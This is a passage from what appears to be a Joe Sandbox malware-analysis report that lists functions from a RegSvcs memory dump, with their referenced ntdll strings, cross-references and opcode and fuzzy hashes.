(UCRBlock->Size >= *Size), xrefs: 014850CA

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: c0fa2fadbe869f1e8e44cc7c74460b9f0b444b00c3bd99a192c7dec67ce2819c
Instruction ID: 5bb6f18abf3fe07fd6437b029337a4409ea53915cb5fff30cb84ec2624cd670c
Opcode Fuzzy Hash: c0fa2fadbe869f1e8e44cc7c74460b9f0b444b00c3bd99a192c7dec67ce2819c
Instruction Fuzzy Hash: 1FF1AE30A00605DFEB25DF69C894B6EB7B5FF88304F14426AE4169B3A1D734E982CF90

Function 01446962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 01446C24
, xrefs: 0148CA51

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: 52950880d0f59b4e17ca71d58db381aa9fdda155e9921acab5bc62333b8cbf77
Instruction ID: fadec01d959eaef3c047715323687b952edcd72be61f7d4077b3f0de802e014f
Opcode Fuzzy Hash: 52950880d0f59b4e17ca71d58db381aa9fdda155e9921acab5bc62333b8cbf77
Instruction Fuzzy Hash: C1C292716083419FE725CF29C481BABBBE5BF88754F05892EE989C7361D734D806CB62

Function 0141A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 0147C2E6
\??\, xrefs: 0147C1E4
UseFilter, xrefs: 0141A1C1

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: f7bb902222e61b06f82142f7c5b00adb0dbbf43d9bd4f745db61a22576b16a20
Instruction ID: b1b5d1e57e3a1acba6c891f8c2535b68f57f2e159be4398eccd1310e49ed8676
Opcode Fuzzy Hash: f7bb902222e61b06f82142f7c5b00adb0dbbf43d9bd4f745db61a22576b16a20
Instruction Fuzzy Hash: EEA16F7191122A9BDB31DF64CC88BEAB7B8EF54714F1001EBE909A7260D7359E85CF50

Function 01440BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

Failed to allocated memory for shimmed module list, xrefs: 0148A10F
minkernel\ntdll\ldrinit.c, xrefs: 0148A121
LdrpCheckModule, xrefs: 0148A117

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: 841fa3181a5ba299d0b92ae0f9d50689c5fb98836449af741000edc9da2d3108
Instruction ID: 83da8792776efe1c925eb5b1965e8f2cc3c8985d4836d9baf4b141f92f2257ca
Opcode Fuzzy Hash: 841fa3181a5ba299d0b92ae0f9d50689c5fb98836449af741000edc9da2d3108
Instruction Fuzzy Hash: A971F470A00206DFEB2AEF69C940AAEB7F4FB44204F15406FE912DB361E774AD46CB54

Function 01430A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01485342
HEAP[%wZ]: , xrefs: 01485335
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 0148534D

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 2d88917e3a9a8c8d7119832097d0f3d3564507e82084bd958a30244965148a74
Instruction ID: 215d56a562535dd520c5edeb353788fae167fab18412e172ea8655580b6fac98
Opcode Fuzzy Hash: 2d88917e3a9a8c8d7119832097d0f3d3564507e82084bd958a30244965148a74
Instruction Fuzzy Hash: BD61AE706003019FDB29DF68C444B6ABBE1FF99704F14866EE4598F3A6D770E882CB91

Function 0145C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 014982E8
LdrpInitializePerUserWindowsDirectory, xrefs: 014982DE
Failed to reallocate the system dirs string !, xrefs: 014982D7

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 2c409027f632e110af7373f902042e51ba3108300c9d932b0e8c62b850e47234
Instruction ID: e2414476666acf8eba3cdc686a81c4ca7cab6b858aa70604752a76d349402746
Opcode Fuzzy Hash: 2c409027f632e110af7373f902042e51ba3108300c9d932b0e8c62b850e47234
Instruction Fuzzy Hash: 84412471544302ABD722EB69D880F5B7BE8EF68A10F01082FF954DB2B5E7B0D804CB91

Function 014DC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 014DC212
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 014DC1C5
@, xrefs: 014DC1F1

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 37cf488b0386f693164da7cd486324d7504e6f310cc14a1a58fdf4da5fc52233
Instruction ID: 7bf4b64b17a4b38dfdd72259fb9dd25f4cfceb212da748b2ca446f55899dbf9e
Opcode Fuzzy Hash: 37cf488b0386f693164da7cd486324d7504e6f310cc14a1a58fdf4da5fc52233
Instruction Fuzzy Hash: 85418072E0020AEBDF11DBD9C891FEEBBB9AB24704F10416FE609A7260D7749A44CB50

Function 014B4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

@, xrefs: 014B4225
LdrpResValidateFilePath Exit, xrefs: 014B4172
LdrpResValidateFilePath Enter, xrefs: 014B4160

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: fa787307a947492878c4e297a7164d2bda4f9115b76d7ad90c063db851118342
Instruction ID: 7c05f3b7102692789d84a45464fe6fbbd8b5eeeb0796308b6a83eb927c38dee9
Opcode Fuzzy Hash: fa787307a947492878c4e297a7164d2bda4f9115b76d7ad90c063db851118342
Instruction Fuzzy Hash: 2541F931A006588BEB25DBD9D884BEDBBB4FF65340F18045BD902EB7B2D7349902CB61

Function 014A4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 014A4899
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 014A4888
LdrpCheckRedirection, xrefs: 014A488F

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: a7094dec4d98975524d71a6c165c1653479d466da9e698befb04c18cce26f012
Instruction ID: f120406db55e6ca886c8d15857a20b0a4d378e30ceeefd5c44c1cede3d9e48ff
Opcode Fuzzy Hash: a7094dec4d98975524d71a6c165c1653479d466da9e698befb04c18cce26f012
Instruction Fuzzy Hash: 7541D63A6002919FCB22CF19E840A2B7BE4EF69650B8F055FED559B371D3B0D800CB81

Function 01430BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0148543E
HEAP[%wZ]: , xrefs: 01485431
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01485449

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 8135ac81683937a3632ade11cb2b659c19ad4bab9e9fe67605dce5fd958a843f
Instruction ID: c576c6480feb8d89354541fa3267691ee24bbeae8c260eef80fafbc3d3813d4f
Opcode Fuzzy Hash: 8135ac81683937a3632ade11cb2b659c19ad4bab9e9fe67605dce5fd958a843f
Instruction Fuzzy Hash: B111CD313151029FDB29EA19C441B7AB3A5EF94A1AF18822FF4068F375DB30D842CB50

Function 014A20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 014A20F3
LdrpInitializationFailure, xrefs: 014A20FA
minkernel\ntdll\ldrinit.c, xrefs: 014A2104

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 7b2171b51a1a2d030876a5e3cf1521eca9850acef6457e6186ec7363432471d5
Instruction ID: 05ca540ed4ca2e8adfc72378ada3f49d650b5900c1c3f64f03689c3b0f51f127
Opcode Fuzzy Hash: 7b2171b51a1a2d030876a5e3cf1521eca9850acef6457e6186ec7363432471d5
Instruction Fuzzy Hash: 32F02835640309ABE721E70EDC46F9A3768EB51B58F51002EF7007B2E1D2F0A600D641

Function 014303E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01484D8A

Strings

#%u, xrefs: 01484D82

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 3fe2e305de9013dcc89e9ee1b2bd8bbec9cb9410153043054f3f8f5157f3513f
Instruction ID: 4b6c60fdb8e75e91e0c8458f42cc2290c93584073598ebd3cd7430b82eafccd6
Opcode Fuzzy Hash: 3fe2e305de9013dcc89e9ee1b2bd8bbec9cb9410153043054f3f8f5157f3513f
Instruction Fuzzy Hash: 3C715D71A0014A9FDB01DFA9D984FAEB7F8BF68304F15406AE905E7261E634EE01CB61

Function 0142A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Exit, xrefs: 0142AA25
LdrResSearchResource Enter, xrefs: 0142AA13

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: 8b606ebdf7109172e299fc24f6cd3d31430e5e5bef0779268c98f813edbd9153
Instruction ID: 1358b60279c4f83713d98dcefb614c42d9581a7f9bd91e2b5f3cc66f6fca98a2
Opcode Fuzzy Hash: 8b606ebdf7109172e299fc24f6cd3d31430e5e5bef0779268c98f813edbd9153
Instruction Fuzzy Hash: B4E17171E002299FEF21DE99C984BAEBBB9BF14710F64042BEE01E7661D774D981CB50

Function 014EA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 014EA44B
`, xrefs: 014EA551

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: cb1a066bc26226a4c3ef6c74aa06d1d655beae4ca5449369c74f2d7ce116cabe
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 56C1D4312043429BEB24CF29C849B6BBBE5BFD4319F284A2EF695C72A0D774D505CB41

Function 0149E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 0149E75A
UEFI, xrefs: 0149E751

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: b39bc9f85a1a4b70f8933ea0e287b526f7cdf709516e74570f30f1cc191b1e3c
Instruction ID: d7fe28a52b6b5c631a6bc60d6ab0d6dd86dae9cebae2cad21540dfdfba2655dd
Opcode Fuzzy Hash: b39bc9f85a1a4b70f8933ea0e287b526f7cdf709516e74570f30f1cc191b1e3c
Instruction Fuzzy Hash: 47617B71E002199FDF24DFA9C840BAEBBB9FB58704F14406EE649EB2A1D731E941CB50

Function 014C43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

@, xrefs: 014C4437
MUI, xrefs: 014C4525

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: 7ac3e111d47ed178708d5fa3fa80db8d7ad1aa49c19e47fa0c596114a3d789b8
Instruction ID: 82860796b2f95f08e589d2cdf99408319a84ae45d11dd3156d6a94b8fb02b69a
Opcode Fuzzy Hash: 7ac3e111d47ed178708d5fa3fa80db8d7ad1aa49c19e47fa0c596114a3d789b8
Instruction Fuzzy Hash: 26516B71E0021DAFDB11DFA9CD90EEFBBBCEB54B54F14052AE601B72A0D6309A05CB60

Function 014204E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0142063D
kLsE, xrefs: 01420540

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 72fa7abc147dc3df11efd4359ca0b7472af401b5675ba717e3f76bc2fda08e81
Instruction ID: 0eeb18fb6b2bad7310ca3bfe2371553854e2bc43352abd17886450c000d7311a
Opcode Fuzzy Hash: 72fa7abc147dc3df11efd4359ca0b7472af401b5675ba717e3f76bc2fda08e81
Instruction Fuzzy Hash: E051AB716047528BD735EF29C4446A7BBE4AF84304F50883FFAAA87361E770E585CB92

Function 0142A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 0142A309
RtlpResUltimateFallbackInfo Enter, xrefs: 0142A2FB

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 1485ee92002bd4203a6bb7d313c12182f22d27e1415c05706da42885105d2854
Instruction ID: 677314143fa23870b3c0fc1da75bcd396afa4ed0e1286af682a3c70682b8184c
Opcode Fuzzy Hash: 1485ee92002bd4203a6bb7d313c12182f22d27e1415c05706da42885105d2854
Instruction Fuzzy Hash: DE419A30A01665DBEB22DF59C844B6E7BB4EF94700F2440AAED00DB7B2E2B5D981CB50

Function 0145A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 0145A5E9
Cleanup Group, xrefs: 0145A5E4

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 4e20f59309abb7a156f13051ff64c86d686eebe329960cb811de16ee4811f54c
Instruction ID: 9539bb24e1101e5f10b9ebccd43023d7568aa66650b4f004f1fa44d7c0b069e6
Opcode Fuzzy Hash: 4e20f59309abb7a156f13051ff64c86d686eebe329960cb811de16ee4811f54c
Instruction Fuzzy Hash: 3E01ADB2240700AFD351DF24CD45B2677E8E794719F058A3EAA9CCB1A1E374D804CB56

Function 0142C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 0142C8C3, 0142CA40

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 75ef14fd7f42459976b730f2ac29f12d76ba0847a1b9b53ec736dcafbbbc5d6d
Instruction ID: 1b2ee79bac08d5f8a8eeda43a15cac01345d83e7c360b49e1f5d72e6bf3024c2
Opcode Fuzzy Hash: 75ef14fd7f42459976b730f2ac29f12d76ba0847a1b9b53ec736dcafbbbc5d6d
Instruction Fuzzy Hash: 7A825075E002299FDB25CFA9C880BEEBBB1BF48310F54816AD919AB361D7709D81CF50

Function 014A6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 014A65C1

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: c3b3f0b59409fc6cefcbc39eb8c81ad78dcf15ccc2cac7af16b155c351ebb1df
Instruction ID: 1a070f95e4c142b3d32873ee567e2059ec621fc3888f9aafccd2e90ae939cd77
Opcode Fuzzy Hash: c3b3f0b59409fc6cefcbc39eb8c81ad78dcf15ccc2cac7af16b155c351ebb1df
Instruction Fuzzy Hash: 5E918771900219AFEB21DF95DD85FAF7BB8EF68B50F55401AF600AB1A0D774AD00CB60

Function 014CE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 014CE1FA

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 3754c7dc9c9f6b34e2dab115dcf106deedd32f8a5746c61d92c48ab513f16948
Instruction ID: 733ebc06afdbd0811367ef3954c19660d4c5669c87117b91bc58ca3eb409f1c5
Opcode Fuzzy Hash: 3754c7dc9c9f6b34e2dab115dcf106deedd32f8a5746c61d92c48ab513f16948
Instruction Fuzzy Hash: 9E918076900605ABDB62AFA6DC44FAFBF7AEF95B50F10001EF501A7271DB74A902CB50

Function 0145A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 014967C9

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 152b1da8774bd2f34773fa8ba6696e33629551170a1d3e542e3db4615507ddf9
Instruction ID: e3e4775dc36cdb48fa8d9b01747aab1acaa92dd3fac50fced3d3a42e8bb8a0a2
Opcode Fuzzy Hash: 152b1da8774bd2f34773fa8ba6696e33629551170a1d3e542e3db4615507ddf9
Instruction Fuzzy Hash: CE716DB5E0120A9FDF28CF9DD590AAEBBB1BF58710F15816FE905AB361E7308841CB50

Function 014C4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 014C4A7F

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 7860167e2f1fe3d14304b3c94a20a7ba7689c1241fa87f5b0e6176fd07c6b825
Instruction ID: 4d34663643234b8ef876a5992279c2b2249ad1403553a448b5e8150f69a7c169
Opcode Fuzzy Hash: 7860167e2f1fe3d14304b3c94a20a7ba7689c1241fa87f5b0e6176fd07c6b825
Instruction Fuzzy Hash: 1551A476D00226DBDF50DF99D950AAEBBB4AF14E10F09412FEA11B7360D7359901CBA0

Function 0143E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 0143E6A4

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: df41af4d690b5c09fa92b3bbaa12551546e3ed33c731aa1fd481cffc3c33d1bb
Instruction ID: d39fc7003f6a1714b74bd27d18b06b1aab20f0c96fb1fc64de9c7a1b11eac6c2
Opcode Fuzzy Hash: df41af4d690b5c09fa92b3bbaa12551546e3ed33c731aa1fd481cffc3c33d1bb
Instruction Fuzzy Hash: B741A07250A3429BD721DA76C840B6BB7E8AFDC718F44092FF684E72A0E774D9058793

Function 0149C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 0149C77F

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: b3a283750c384760051c8a2dce2124237a784d9ad66d8c2265933693062ee26c
Instruction ID: 5543ad128b549ebb945f9afb5001e2deb2afa026e19a91cf067836b07004c3d0
Opcode Fuzzy Hash: b3a283750c384760051c8a2dce2124237a784d9ad66d8c2265933693062ee26c
Instruction Fuzzy Hash: 7D4146B1D0012DAADF21DB51CC84FDEBB7CAB54718F0045EAE608AB150DB709E498FA5

Function 014B6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 014B6B91

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: fc7bab727f906a80a69c6feceb861c7e9065585ee38e9c647cd54f31d9add0c8
Instruction ID: 60c9bda3f12b89c6b645fe7d47cd88f3864c109f97f9871da51bd0d0e93cfcc7
Opcode Fuzzy Hash: fc7bab727f906a80a69c6feceb861c7e9065585ee38e9c647cd54f31d9add0c8
Instruction Fuzzy Hash: F0311631A007199BEB32DB69C890BEE7BB8DF55704F16402EE950AB2A2D775DC05CB60

Function 0149CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 0149CAA2

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: fa631a78cd87b0022ded1c2997b553975ce4c17bd20c90e089c235ea71b06249
Instruction ID: 1aeff1b6e65b8094cfcafde2a0e8cb97130429af7ac336e100929ed7fcc0b6dd
Opcode Fuzzy Hash: fa631a78cd87b0022ded1c2997b553975ce4c17bd20c90e089c235ea71b06249
Instruction Fuzzy Hash: F631E13690051AAFEF16DB59D895E7FBF74EB90760F01412AE905AB2A0D7309E04DBE0

Function 014A892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 014A895E

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 5f7c4cf10e7be55064e67f9979ef97c891c532aba09718184a0afd24827bcd7d
Instruction ID: 70d13e965de468c60fcb8482ab2a9fc4188d1edc9d178b1d6f61f4f738f9edb2
Opcode Fuzzy Hash: 5f7c4cf10e7be55064e67f9979ef97c891c532aba09718184a0afd24827bcd7d
Instruction Fuzzy Hash: 3E0147322102029BF6226B1AC884A977F69FFF6655BC6002FF6410A275CB306C86C792

Function 014C2000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ad9e1e79cb0a46e979e0daa5b87e6998128cd73893628d562cc10d62fa88dae
Instruction ID: 9ee7d3b654e2787c709558536d6a0f7dc1b604b5c4f2e68f0d085e464aa861e5
Opcode Fuzzy Hash: 0ad9e1e79cb0a46e979e0daa5b87e6998128cd73893628d562cc10d62fa88dae
Instruction Fuzzy Hash: 8E42A3796043419BD765CF69C890E6BBBE5AB98B00F08092FFA8697370D6F0D845CB52

Function 014B8158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fdefaa12979b1d3a148834dceacf98af05b1a0bc5a84ac9c368bed0fbae2608
Instruction ID: f43157d889328e832e83fd7570640688f42a4e8f31c98ad93b60bccc59b4a8d3
Opcode Fuzzy Hash: 1fdefaa12979b1d3a148834dceacf98af05b1a0bc5a84ac9c368bed0fbae2608
Instruction Fuzzy Hash: 07425275A0021A8FEB25CF69C881BEEBBF9BF54300F14819AE549EB351D7349985CF60

Function 01432840 Relevance: .6, Instructions: 605COMMON

